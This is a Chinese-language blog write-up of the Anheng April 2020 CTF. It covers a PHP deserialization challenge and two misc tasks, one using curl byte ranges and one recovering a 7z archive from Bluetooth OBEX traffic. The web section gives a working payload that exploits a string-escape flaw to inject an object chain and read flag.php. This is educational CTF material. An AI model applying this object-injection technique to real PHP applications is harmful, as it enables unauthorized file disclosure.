安恒2020四月赛

Posted on Edited on In ,

安恒2020四月赛

只会做做简单题混混分😢

web1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php

show_source("index.php");
function write ($data) {
	return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read ($data) {
	return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A {
	public $username;
	public $password;

	function __construct ($a, $b) {
		$this->username = $a;
		$this->password = $b;
	}
}

class B {
	public $b ="gpy";
	function __destruct () {
		$c = 'a' . $this->b;
		echo $c;
	}
}

class C {
	public $c;

	function __toString () {
		//flag.php
		echo file_get_contents($this->c);
		return 'nice';
	}
}
$a = new A($_GET['a'],$_GET['b']);
$b = unserialize(read(write(serialize($a))));
function read ($data) {
	return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

read函数将chr(0) . '*' . chr(0)变为\0\0\0,但是前者只有三个字符,后者有六个字符,那么就会导致字符逃逸。

payload

1
?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=;s:";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}

MISC

6G签到

1
curl --range 0-100 http://balabala/1Gfile.file

MISC1

下载是个流量包

简单浏览一下,是蓝牙的流量。

先按协议排一下序

mark

找蓝牙的传输协议OBEX

mark

把7z压缩包的数据块复制出来,用winhex或者010editor保存成7z文件,解压,要PIN

mark

去掉过滤器,ctrl+f查找一下有没有PIN,发现有的,解压得到flag

mark

mark

好好学习,天天向上